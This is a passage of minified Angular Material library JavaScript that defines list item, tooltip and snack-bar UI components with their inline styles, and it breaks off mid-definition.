.mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:0;padding-left:16px}[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:0}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-left:0;padding-right:16px}[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-right:0;padding-left:16px}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:16px}.mat-list-base[dense] .mat-list-item .mat-list-avatar,.mat-list-base[dense] .mat-list-option .mat-list-avatar{flex-shrink:0;width:36px;height:36px;border-radius:50%;object-fit:cover}.mat-list-base[dense] .mat-list-item .mat-list-avatar~.mat-divider-inset,.mat-list-base[dense] .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:68px;width:calc(100% - 68px)}[dir=rtl] .mat-list-base[dense] .mat-list-item .mat-list-avatar~.mat-divider-inset,[dir=rtl] .mat-list-base[dense] .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:auto;margin-right:68px}.mat-list-base[dense] .mat-list-item .mat-list-icon,.mat-list-base[dense] .mat-list-option .mat-list-icon{flex-shrink:0;width:20px;height:20px;font-size:20px;box-sizing:content-box;border-radius:50%;padding:4px}.mat-list-base[dense] .mat-list-item .mat-list-icon~.mat-divider-inset,.mat-list-base[dense] .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:60px;width:calc(100% - 60px)}[dir=rtl] .mat-list-base[dense] .mat-list-item .mat-list-icon~.mat-divider-inset,[dir=rtl] .mat-list-base[dense] .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:auto;margin-right:60px}.mat-list-base[dense] .mat-list-item .mat-divider,.mat-list-base[dense] .mat-list-option .mat-divider{position:absolute;bottom:0;left:0;width:100%;margin:0}[dir=rtl] .mat-list-base[dense] .mat-list-item .mat-divider,[dir=rtl] .mat-list-base[dense] .mat-list-option .mat-divider{margin-left:auto;margin-right:0}.mat-list-base[dense] .mat-list-item .mat-divider.mat-divider-inset,.mat-list-base[dense] .mat-list-option .mat-divider.mat-divider-inset{position:absolute}.mat-nav-list a{text-decoration:none;color:inherit}.mat-nav-list .mat-list-item{cursor:pointer;outline:none}mat-action-list .mat-list-item{cursor:pointer;outline:inherit}.mat-list-option:not(.mat-list-item-disabled){cursor:pointer;outline:none}.mat-list-item-disabled{pointer-events:none}.cdk-high-contrast-active .mat-list-item-disabled{opacity:.5}.cdk-high-contrast-active :host .mat-list-item-disabled{opacity:.5}.cdk-high-contrast-active .mat-list-option:hover,.cdk-high-contrast-active .mat-nav-list .mat-list-item:hover,.cdk-high-contrast-active mat-action-list .mat-list-item:hover{outline:dotted 1px;z-index:1}.cdk-high-contrast-active .mat-list-single-selected-option::after{content:"";position:absolute;top:50%;right:16px;transform:translateY(-50%);width:10px;height:0;border-bottom:solid 10px;border-radius:10px}.cdk-high-contrast-active [dir=rtl] .mat-list-single-selected-option::after{right:auto;left:16px}@media(hover: none){.mat-list-option:not(.mat-list-single-selected-option):not(.mat-list-item-disabled):hover,.mat-nav-list .mat-list-item:not(.mat-list-item-disabled):hover,.mat-action-list .mat-list-item:not(.mat-list-item-disabled):hover{background:none}}'],encapsulation:2,changeDetection:0}),t})(),$F=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-list-avatar",""],["","matListAvatar",""]],hostAttrs:[1,"mat-list-avatar"]}),t})(),Lr=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-list-icon",""],["","matListIcon",""]],hostAttrs:[1,"mat-list-icon"]}),t})(),rc=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-subheader",""],["","matSubheader",""]],hostAttrs:[1,"mat-subheader"]}),t})(),is=(()=>{class t extends a1e{constructor(e,i,n,r){super(),this._element=e,this._isInteractiveList=!1,this._destroyed=new J,this._disabled=!1,this._isInteractiveList=!!(n||r&&"action-list"===r._getListType()),this._list=n||r;const c=this._getHostElement();"button"===c.nodeName.toLowerCase()&&!c.hasAttribute("type")&&c.setAttribute("type","button"),this._list&&this._list._stateChanges.pipe(ea(this._destroyed)).subscribe(()=>{i.markForCheck()})}get disabled(){return this._disabled||!(!this._list||!this._list.disabled)}set disabled(e){this._disabled=wi(e)}ngAfterContentInit(){!function MW(t,a,e="mat"){t.changes.pipe(Ro(t)).subscribe(({length:i})=>{eb(a,`${e}-2-line`,!1),eb(a,`${e}-3-line`,!1),eb(a,`${e}-multi-line`,!1),2===i||3===i?eb(a,`${e}-${i}-line`,!0):i>3&&eb(a,`${e}-multi-line`,!0)})}(this._lines,this._element)}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}_isRippleDisabled(){return!this._isInteractiveList||this.disableRipple||!(!this._list||!this._list.disableRipple)}_getHostElement(){return this._element.nativeElement}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(n1e,8),Ee(QF,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-list-item"],["a","mat-list-item",""],["button","mat-list-item",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,$F,5),fa(n,Lr,5),fa(n,Or,5)),2&e){let r;Vt(r=Bt())&&(i._avatar=r.first),Vt(r=Bt())&&(i._icon=r.first),Vt(r=Bt())&&(i._lines=r)}},hostAttrs:[1,"mat-list-item","mat-focus-indicator"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-list-item-disabled",i.disabled)("mat-list-item-with-avatar",i._avatar||i._icon)},inputs:{disableRipple:"disableRipple",disabled:"disabled"},exportAs:["matListItem"],features:[ci],ngContentSelectors:Y0e,decls:6,vars:2,consts:[[1,"mat-list-item-content"],["mat-ripple","",1,"mat-list-item-ripple",3,"matRippleTrigger","matRippleDisabled"],[1,"mat-list-text"]],template:function(e,i){1&e&&(Jn(X0e),m(0,"span",0),it(1,"span",1),va(2),m(3,"span",2),va(4,1),u(),va(5,2),u()),2&e&&(C(1),V("matRippleTrigger",i._getHostElement())("matRippleDisabled",i._isRippleDisabled()))},dependencies:[Dl],encapsulation:2,changeDetection:0}),t})(),XF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[vW,Od,la,Qw,rn,vW,la,Qw,u8]}),t})();const d1e=["tooltip"],YF="tooltip-panel",JF=ym({passive:!0}),ZF=new ni("mat-tooltip-scroll-strategy"),f1e={provide:ZF,deps:[As],useFactory:function h1e(t){return()=>t.scrollStrategies.reposition({scrollThrottle:20})}},p1e=new ni("mat-tooltip-default-options",{providedIn:"root",factory:function _1e(){return{showDelay:0,hideDelay:0,touchendHideDelay:1500}}});let g1e=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this._overlay=e,this._elementRef=i,this._scrollDispatcher=n,this._viewContainerRef=r,this._ngZone=c,this._platform=d,this._ariaDescriber=T,this._focusMonitor=k,this._dir=Y,this._defaultOptions=te,this._position="below",this._disabled=!1,this._viewInitialized=!1,this._pointerExitEventsInitialized=!1,this._viewportMargin=8,this._cssClassPrefix="mat",this._showDelay=this._defaultOptions.showDelay,this._hideDelay=this._defaultOptions.hideDelay,this.touchGestures="auto",this._message="",this._passiveListeners=[],this._destroyed=new J,this._scrollStrategy=q,this._document=pe,te&&(te.position&&(this.position=te.position),te.touchGestures&&(this.touchGestures=te.touchGestures)),Y.change.pipe(ea(this._destroyed)).subscribe(()=>{this._overlayRef&&this._updatePosition(this._overlayRef)})}get position(){return this._position}set position(e){var i;e!==this._position&&(this._position=e,this._overlayRef&&(this._updatePosition(this._overlayRef),null===(i=this._tooltipInstance)||void 0===i||i.show(0),this._overlayRef.updatePosition()))}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._disabled?this.hide(0):this._setupPointerEnterEventsIfNeeded()}get showDelay(){return this._showDelay}set showDelay(e){this._showDelay=Uo(e)}get hideDelay(){return this._hideDelay}set hideDelay(e){this._hideDelay=Uo(e),this._tooltipInstance&&(this._tooltipInstance._mouseLeaveHideDelay=this._hideDelay)}get message(){return this._message}set message(e){this._ariaDescriber.removeDescription(this._elementRef.nativeElement,this._message,"tooltip"),this._message=null!=e?String(e).trim():"",!this._message&&this._isTooltipVisible()?this.hide(0):(this._setupPointerEnterEventsIfNeeded(),this._updateTooltipMessage(),this._ngZone.runOutsideAngular(()=>{Promise.resolve().then(()=>{this._ariaDescriber.describe(this._elementRef.nativeElement,this.message,"tooltip")})}))}get tooltipClass(){return this._tooltipClass}set tooltipClass(e){this._tooltipClass=e,this._tooltipInstance&&this._setTooltipClass(this._tooltipClass)}ngAfterViewInit(){this._viewInitialized=!0,this._setupPointerEnterEventsIfNeeded(),this._focusMonitor.monitor(this._elementRef).pipe(ea(this._destroyed)).subscribe(e=>{e?"keyboard"===e&&this._ngZone.run(()=>this.show()):this._ngZone.run(()=>this.hide(0))})}ngOnDestroy(){const e=this._elementRef.nativeElement;clearTimeout(this._touchstartTimeout),this._overlayRef&&(this._overlayRef.dispose(),this._tooltipInstance=null),this._passiveListeners.forEach(([i,n])=>{e.removeEventListener(i,n,JF)}),this._passiveListeners.length=0,this._destroyed.next(),this._destroyed.complete(),this._ariaDescriber.removeDescription(e,this.message,"tooltip"),this._focusMonitor.stopMonitoring(e)}show(e=this.showDelay){var i;if(this.disabled||!this.message||this._isTooltipVisible())return void(null===(i=this._tooltipInstance)||void 0===i||i._cancelPendingAnimations());const n=this._createOverlay();this._detach(),this._portal=this._portal||new hp(this._tooltipComponent,this._viewContainerRef);const r=this._tooltipInstance=n.attach(this._portal).instance;r._triggerElement=this._elementRef.nativeElement,r._mouseLeaveHideDelay=this._hideDelay,r.afterHidden().pipe(ea(this._destroyed)).subscribe(()=>this._detach()),this._setTooltipClass(this._tooltipClass),this._updateTooltipMessage(),r.show(e)}hide(e=this.hideDelay){const i=this._tooltipInstance;i&&(i.isVisible()?i.hide(e):(i._cancelPendingAnimations(),this._detach()))}toggle(){this._isTooltipVisible()?this.hide():this.show()}_isTooltipVisible(){return!!this._tooltipInstance&&this._tooltipInstance.isVisible()}_createOverlay(){var e;if(this._overlayRef)return this._overlayRef;const i=this._scrollDispatcher.getAncestorScrollContainers(this._elementRef),n=this._overlay.position().flexibleConnectedTo(this._elementRef).withTransformOriginOn(`.${this._cssClassPrefix}-tooltip`).withFlexibleDimensions(!1).withViewportMargin(this._viewportMargin).withScrollableContainers(i);return n.positionChanges.pipe(ea(this._destroyed)).subscribe(r=>{this._updateCurrentPositionClass(r.connectionPair),this._tooltipInstance&&r.scrollableViewProperties.isOverlayClipped&&this._tooltipInstance.isVisible()&&this._ngZone.run(()=>this.hide(0))}),this._overlayRef=this._overlay.create({direction:this._dir,positionStrategy:n,panelClass:`${this._cssClassPrefix}-${YF}`,scrollStrategy:this._scrollStrategy()}),this._updatePosition(this._overlayRef),this._overlayRef.detachments().pipe(ea(this._destroyed)).subscribe(()=>this._detach()),this._overlayRef.outsidePointerEvents().pipe(ea(this._destroyed)).subscribe(()=>{var r;return null===(r=this._tooltipInstance)||void 0===r?void 0:r._handleBodyInteraction()}),this._overlayRef.keydownEvents().pipe(ea(this._destroyed)).subscribe(r=>{this._isTooltipVisible()&&27===r.keyCode&&!es(r)&&(r.preventDefault(),r.stopPropagation(),this._ngZone.run(()=>this.hide(0)))}),!(null===(e=this._defaultOptions)||void 0===e)&&e.disableTooltipInteractivity&&this._overlayRef.addPanelClass(`${this._cssClassPrefix}-tooltip-panel-non-interactive`),this._overlayRef}_detach(){this._overlayRef&&this._overlayRef.hasAttached()&&this._overlayRef.detach(),this._tooltipInstance=null}_updatePosition(e){const i=e.getConfig().positionStrategy,n=this._getOrigin(),r=this._getOverlayPosition();i.withPositions([this._addOffset(Object.assign(Object.assign({},n.main),r.main)),this._addOffset(Object.assign(Object.assign({},n.fallback),r.fallback))])}_addOffset(e){return e}_getOrigin(){const e=!this._dir||"ltr"==this._dir.value,i=this.position;let n;"above"==i||"below"==i?n={originX:"center",originY:"above"==i?"top":"bottom"}:"before"==i||"left"==i&&e||"right"==i&&!e?n={originX:"start",originY:"center"}:("after"==i||"right"==i&&e||"left"==i&&!e)&&(n={originX:"end",originY:"center"});const{x:r,y:c}=this._invertPosition(n.originX,n.originY);return{main:n,fallback:{originX:r,originY:c}}}_getOverlayPosition(){const e=!this._dir||"ltr"==this._dir.value,i=this.position;let n;"above"==i?n={overlayX:"center",overlayY:"bottom"}:"below"==i?n={overlayX:"center",overlayY:"top"}:"before"==i||"left"==i&&e||"right"==i&&!e?n={overlayX:"end",overlayY:"center"}:("after"==i||"right"==i&&e||"left"==i&&!e)&&(n={overlayX:"start",overlayY:"center"});const{x:r,y:c}=this._invertPosition(n.overlayX,n.overlayY);return{main:n,fallback:{overlayX:r,overlayY:c}}}_updateTooltipMessage(){this._tooltipInstance&&(this._tooltipInstance.message=this.message,this._tooltipInstance._markForCheck(),this._ngZone.onMicrotaskEmpty.pipe(Cn(1),ea(this._destroyed)).subscribe(()=>{this._tooltipInstance&&this._overlayRef.updatePosition()}))}_setTooltipClass(e){this._tooltipInstance&&(this._tooltipInstance.tooltipClass=e,this._tooltipInstance._markForCheck())}_invertPosition(e,i){return"above"===this.position||"below"===this.position?"top"===i?i="bottom":"bottom"===i&&(i="top"):"end"===e?e="start":"start"===e&&(e="end"),{x:e,y:i}}_updateCurrentPositionClass(e){const{overlayY:i,originX:n,originY:r}=e;let c;if(c="center"===i?this._dir&&"rtl"===this._dir.value?"end"===n?"left":"right":"start"===n?"left":"right":"bottom"===i&&"top"===r?"above":"below",c!==this._currentPosition){const d=this._overlayRef;if(d){const T=`${this._cssClassPrefix}-${YF}-`;d.removePanelClass(T+this._currentPosition),d.addPanelClass(T+c)}this._currentPosition=c}}_setupPointerEnterEventsIfNeeded(){this._disabled||!this.message||!this._viewInitialized||this._passiveListeners.length||(this._platformSupportsMouseEvents()?this._passiveListeners.push(["mouseenter",()=>{this._setupPointerExitEventsIfNeeded(),this.show()}]):"off"!==this.touchGestures&&(this._disableNativeGesturesIfNecessary(),this._passiveListeners.push(["touchstart",()=>{this._setupPointerExitEventsIfNeeded(),clearTimeout(this._touchstartTimeout),this._touchstartTimeout=setTimeout(()=>this.show(),500)}])),this._addListeners(this._passiveListeners))}_setupPointerExitEventsIfNeeded(){if(this._pointerExitEventsInitialized)return;this._pointerExitEventsInitialized=!0;const e=[];if(this._platformSupportsMouseEvents())e.push(["mouseleave",i=>{var n;const r=i.relatedTarget;(!r||null===(n=this._overlayRef)||void 0===n||!n.overlayElement.contains(r))&&this.hide()}],["wheel",i=>this._wheelListener(i)]);else if("off"!==this.touchGestures){this._disableNativeGesturesIfNecessary();const i=()=>{clearTimeout(this._touchstartTimeout),this.hide(this._defaultOptions.touchendHideDelay)};e.push(["touchend",i],["touchcancel",i])}this._addListeners(e),this._passiveListeners.push(...e)}_addListeners(e){e.forEach(([i,n])=>{this._elementRef.nativeElement.addEventListener(i,n,JF)})}_platformSupportsMouseEvents(){return!this._platform.IOS&&!this._platform.ANDROID}_wheelListener(e){if(this._isTooltipVisible()){const i=this._document.elementFromPoint(e.clientX,e.clientY),n=this._elementRef.nativeElement;i!==n&&!n.contains(i)&&this.hide()}}_disableNativeGesturesIfNecessary(){const e=this.touchGestures;if("off"!==e){const i=this._elementRef.nativeElement,n=i.style;("on"===e||"INPUT"!==i.nodeName&&"TEXTAREA"!==i.nodeName)&&(n.userSelect=n.msUserSelect=n.webkitUserSelect=n.MozUserSelect="none"),("on"===e||!i.draggable)&&(n.webkitUserDrag="none"),n.touchAction="none",n.webkitTapHighlightColor="transparent"}}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,inputs:{position:["matTooltipPosition","position"],disabled:["matTooltipDisabled","disabled"],showDelay:["matTooltipShowDelay","showDelay"],hideDelay:["matTooltipHideDelay","hideDelay"],touchGestures:["matTooltipTouchGestures","touchGestures"],message:["matTooltip","message"],tooltipClass:["matTooltipClass","tooltipClass"]}}),t})(),Pa=(()=>{class t extends g1e{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){super(e,i,n,r,c,d,T,k,q,Y,te,pe),this._tooltipComponent=y1e}}return t.\u0275fac=function(e){return new(e||t)(Ee(As),Ee(mi),Ee(By),Ee(fo),Ee(qi),Ee(cr),Ee(Pw),Ee(js),Ee(ZF),Ee(Cr,8),Ee(p1e,8),Ee(ga))},t.\u0275dir=Ot({type:t,selectors:[["","matTooltip",""]],hostAttrs:[1,"mat-tooltip-trigger"],exportAs:["matTooltip"],features:[ci]}),t})(),C1e=(()=>{class t{constructor(e,i){this._changeDetectorRef=e,this._closeOnInteraction=!1,this._isVisible=!1,this._onHide=new J,this._animationsDisabled="NoopAnimations"===i}show(e){clearTimeout(this._hideTimeoutId),this._showTimeoutId=setTimeout(()=>{this._toggleVisibility(!0),this._showTimeoutId=void 0},e)}hide(e){clearTimeout(this._showTimeoutId),this._hideTimeoutId=setTimeout(()=>{this._toggleVisibility(!1),this._hideTimeoutId=void 0},e)}afterHidden(){return this._onHide}isVisible(){return this._isVisible}ngOnDestroy(){this._cancelPendingAnimations(),this._onHide.complete(),this._triggerElement=null}_handleBodyInteraction(){this._closeOnInteraction&&this.hide(0)}_markForCheck(){this._changeDetectorRef.markForCheck()}_handleMouseLeave({relatedTarget:e}){(!e||!this._triggerElement.contains(e))&&(this.isVisible()?this.hide(this._mouseLeaveHideDelay):this._finalizeAnimation(!1))}_onShow(){}_handleAnimationEnd({animationName:e}){(e===this._showAnimation||e===this._hideAnimation)&&this._finalizeAnimation(e===this._showAnimation)}_cancelPendingAnimations(){clearTimeout(this._showTimeoutId),clearTimeout(this._hideTimeoutId),this._showTimeoutId=this._hideTimeoutId=void 0}_finalizeAnimation(e){e?this._closeOnInteraction=!0:this.isVisible()||this._onHide.next()}_toggleVisibility(e){const i=this._tooltip.nativeElement,n=this._showAnimation,r=this._hideAnimation;if(i.classList.remove(e?r:n),i.classList.add(e?n:r),this._isVisible=e,e&&!this._animationsDisabled&&"function"==typeof getComputedStyle){const c=getComputedStyle(i);("0s"===c.getPropertyValue("animation-duration")||"none"===c.getPropertyValue("animation-name"))&&(this._animationsDisabled=!0)}e&&this._onShow(),this._animationsDisabled&&(i.classList.add("_mat-animation-noopable"),this._finalizeAnimation(e))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(ar,8))},t.\u0275dir=Ot({type:t}),t})(),y1e=(()=>{class t extends C1e{constructor(e,i,n){super(e,n),this._breakpointObserver=i,this._isHandset=this._breakpointObserver.observe("(max-width: 599.98px) and (orientation: portrait), (max-width: 959.98px) and (orientation: landscape)"),this._showAnimation="mat-tooltip-show",this._hideAnimation="mat-tooltip-hide"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(O3),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tooltip-component"]],viewQuery:function(e,i){if(1&e&&Mi(d1e,7),2&e){let n;Vt(n=Bt())&&(i._tooltip=n.first)}},hostAttrs:["aria-hidden","true"],hostVars:2,hostBindings:function(e,i){1&e&&he("mouseleave",function(r){return i._handleMouseLeave(r)}),2&e&&ri("zoom",i.isVisible()?1:null)},features:[ci],decls:4,vars:6,consts:[[1,"mat-tooltip",3,"ngClass","animationend"],["tooltip",""]],template:function(e,i){if(1&e&&(m(0,"div",0,1),he("animationend",function(r){return i._handleAnimationEnd(r)}),oe(2,"async"),s(3),u()),2&e){let n;Ct("mat-tooltip-handset",null==(n=re(2,4,i._isHandset))?null:n.matches),V("ngClass",i.tooltipClass),C(3),ke(i.message)}},dependencies:[ig,Jv],styles:[".mat-tooltip{color:#fff;border-radius:4px;margin:14px;max-width:250px;padding-left:8px;padding-right:8px;overflow:hidden;text-overflow:ellipsis;transform:scale(0)}.mat-tooltip._mat-animation-noopable{animation:none;transform:scale(1)}.cdk-high-contrast-active .mat-tooltip{outline:solid 1px}.mat-tooltip-handset{margin:24px;padding-left:16px;padding-right:16px}.mat-tooltip-panel-non-interactive{pointer-events:none}@keyframes mat-tooltip-show{0%{opacity:0;transform:scale(0)}50%{opacity:.5;transform:scale(0.99)}100%{opacity:1;transform:scale(1)}}@keyframes mat-tooltip-hide{0%{opacity:1;transform:scale(1)}100%{opacity:0;transform:scale(1)}}.mat-tooltip-show{animation:mat-tooltip-show 200ms cubic-bezier(0, 0, 0.2, 1) forwards}.mat-tooltip-hide{animation:mat-tooltip-hide 100ms cubic-bezier(0, 0, 0.2, 1) forwards}"],encapsulation:2,changeDetection:0}),t})(),h8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[f1e],imports:[Xy,rn,bu,la,la,uu]}),t})();function b1e(t,a){if(1&t){const e=Ye();m(0,"div",2)(1,"button",3),he("click",function(){return be(e),Me(B().action())}),s(2),u()()}if(2&t){const e=B();C(2),ke(e.data.action)}}function M1e(t,a){}const eV=new ni("MatSnackBarData");class nA{constructor(){this.politeness="assertive",this.announcementMessage="",this.duration=0,this.data=null,this.horizontalPosition="center",this.verticalPosition="bottom"}}const v1e=Math.pow(2,31)-1;class f8{constructor(a,e){this._overlayRef=e,this._afterDismissed=new J,this._afterOpened=new J,this._onAction=new J,this._dismissedByAction=!1,this.containerInstance=a,a._onExit.subscribe(()=>this._finishDismiss())}dismiss(){this._afterDismissed.closed||this.containerInstance.exit(),clearTimeout(this._durationTimeoutId)}dismissWithAction(){this._onAction.closed||(this._dismissedByAction=!0,this._onAction.next(),this._onAction.complete(),this.dismiss()),clearTimeout(this._durationTimeoutId)}closeWithAction(){this.dismissWithAction()}_dismissAfter(a){this._durationTimeoutId=setTimeout(()=>this.dismiss(),Math.min(a,v1e))}_open(){this._afterOpened.closed||(this._afterOpened.next(),this._afterOpened.complete())}_finishDismiss(){this._overlayRef.dispose(),this._onAction.closed||this._onAction.complete(),this._afterDismissed.next({dismissedByAction:this._dismissedByAction}),this._afterDismissed.complete(),this._dismissedByAction=!1}afterDismissed(){return this._afterDismissed}afterOpened(){return this.containerInstance._onEnter}onAction(){return this._onAction}}let A1e=(()=>{class t{constructor(e,i){this.snackBarRef=e,this.data=i}action(){this.snackBarRef.dismissWithAction()}get hasAction(){return!!this.data.action}}return t.\u0275fac=function(e){return new(e||t)(Ee(f8),Ee(eV))},t.\u0275cmp=Wt({type:t,selectors:[["simple-snack-bar"]],hostAttrs:[1,"mat-simple-snackbar"],decls:3,vars:2,consts:[[1,"mat-simple-snack-bar-content"],["class","mat-simple-snackbar-action",4,"ngIf"],[1,"mat-simple-snackbar-action"],["mat-button","",3,"click"]],template:function(e,i){1&e&&(m(0,"span",0),s(1),u(),ne(2,b1e,3,1,"div",1)),2&e&&(C(1),ke(i.data.message),C(1),V("ngIf",i.hasAction))},dependencies:[Ri,da],styles:[".mat-simple-snackbar{display:flex;justify-content:space-between;align-items:center;line-height:20px;opacity:1}.mat-simple-snackbar-action{flex-shrink:0;margin:-8px -8px -8px 8px}.mat-simple-snackbar-action button{max-height:36px;min-width:0}[dir=rtl] .mat-simple-snackbar-action{margin-left:-8px;margin-right:8px}.mat-simple-snack-bar-content{overflow:hidden;text-overflow:ellipsis}"],encapsulation:2,changeDetection:0}),t})();const T1e={snackBarState:nr("state",[sn("void, hidden",zi({transform:"scale(0.8)",opacity:0})),sn("visible",zi({transform:"scale(1)",opacity:1})),gn("* => visible",En("150ms cubic-bezier(0, 0, 0.2, 1)")),gn("* => void, * => hidden",En("75ms cubic-bezier(0.4, 0.0, 1, 1)",zi({opacity:0})))])};let E1e=(()=>{class t extends eA{constructor(e,i,n,r,c){super(),this._ngZone=e,this._elementRef=i,this._changeDetectorRef=n,this._platform=r,this.snackBarConfig=c,this._announceDelay=150,this._destroyed=!1,this._onAnnounce=new J,this._onExit=new J,this._onEnter=new J,this._animationState="void",this.attachDomPortal=d=>{this._assertNotAttached();const T=this._portalOutlet.attachDomPortal(d);return this._afterPortalAttached(),T},this._live="assertive"!==c.politeness||c.announcementMessage?"off"===c.politeness?"off":"polite":"assertive",this._platform.FIREFOX&&("polite"===this._live&&(this._role="status"),"assertive"===this._live&&(this._role="alert"))}attachComponentPortal(e){this._assertNotAttached();const i=this._portalOutlet.attachComponentPortal(e);return this._afterPortalAttached(),i}attachTemplatePortal(e){this._assertNotAttached();const i=this._portalOutlet.attachTemplatePortal(e);return this._afterPortalAttached(),i}onAnimationEnd(e){const{fromState:i,toState:n}=e;if(("void"===n&&"void"!==i||"hidden"===n)&&this._completeExit(),"visible"===n){const r=this._onEnter;this._ngZone.run(()=>{r.next(),r.complete()})}}enter(){this._destroyed||(this._animationState="visible",this._changeDetectorRef.detectChanges(),this._screenReaderAnnounce())}exit(){return this._ngZone.run(()=>{this._animationState="hidden",this._elementRef.nativeElement.setAttribute("mat-exit",""),clearTimeout(this._announceTimeoutId)}),this._onExit}ngOnDestroy(){this._destroyed=!0,this._completeExit()}_completeExit(){this._ngZone.onMicrotaskEmpty.pipe(Cn(1)).subscribe(()=>{this._ngZone.run(()=>{this._onExit.next(),this._onExit.complete()})})}_afterPortalAttached(){const e=this._elementRef.nativeElement,i=this.snackBarConfig.panelClass;i&&(Array.isArray(i)?i.forEach(n=>e.classList.add(n)):e.classList.add(i))}_assertNotAttached(){this._portalOutlet.hasAttached()}_screenReaderAnnounce(){this._announceTimeoutId||this._ngZone.runOutsideAngular(()=>{this._announceTimeoutId=setTimeout(()=>{const e=this._elementRef.nativeElement.querySelector("[aria-hidden]"),i=this._elementRef.nativeElement.querySelector("[aria-live]");if(e&&i){let n=null;this._platform.isBrowser&&document.activeElement instanceof HTMLElement&&e.contains(document.activeElement)&&(n=document.activeElement),e.removeAttribute("aria-hidden"),i.appendChild(e),null==n||n.focus(),this._onAnnounce.next(),this._onAnnounce.complete()}},this._announceDelay)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(Ma),Ee(cr),Ee(nA))},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&Mi(Cu,7),2&e){let n;Vt(n=Bt())&&(i._portalOutlet=n.first)}},features:[ci]}),t})(),D1e=(()=>{class t extends E1e{_afterPortalAttached(){super._afterPortalAttached(),"center"===this.snackBarConfig.horizontalPosition&&this._elementRef.nativeElement.classList.add("mat-snack-bar-center"),"top"===this.snackBarConfig.verticalPosition&&this._elementRef.nativeElement.classList.add("mat-snack-bar-top")}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["snack-bar-container"]],hostAttrs:[1,"mat-snack-bar-container"],hostVars:1,hostBindings:function(e,i){1&e&&GC("@state.done",function(r){return i.onAnimationEnd(r)}),2&e&&s1("@state",i._animationState)},features:[ci],decls:3,vars:2,consts:[["aria-hidden","true"],["cdkPortalOutlet",""]],template:function(e,i){1&e&&(m(0,"div",0),ne(1,M1e,0,0,"ng-template",1),u(),it(2,"div")),2&e&&(C(2),Rt("aria-live",i._live)("role",i._role))},dependencies:[Cu],styles:[".mat-snack-bar-container{border-radius:4px;box-sizing:border-box;display:block;margin:24px;max-width:33vw;min-width:344px;padding:14px 16px;min-height:48px;transform-origin:center}.cdk-high-contrast-active .mat-snack-bar-container{border:solid 1px}.mat-snack-bar-handset{width:100%}.mat-snack-bar-handset .mat-snack-bar-container{margin:8px;max-width:100%;min-width:0;width:100%}"],encapsulation:2,data:{animation:[T1e.snackBarState]}}),t})(),p8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[bu,yu,rn,up,la,la]}),t})();const tV=new ni("mat-snack-bar-default-options",{providedIn:"root",factory:function x1e(){return new nA}});let w1e=(()=>{class t{constructor(e,i,n,r,c,d){this._overlay=e,this._live=i,this._injector=n,this._breakpointObserver=r,this._parentSnackBar=c,this._defaultConfig=d,this._snackBarRefAtThisLevel=null}get _openedSnackBarRef(){const e=this._parentSnackBar;return e?e._openedSnackBarRef:this._snackBarRefAtThisLevel}set 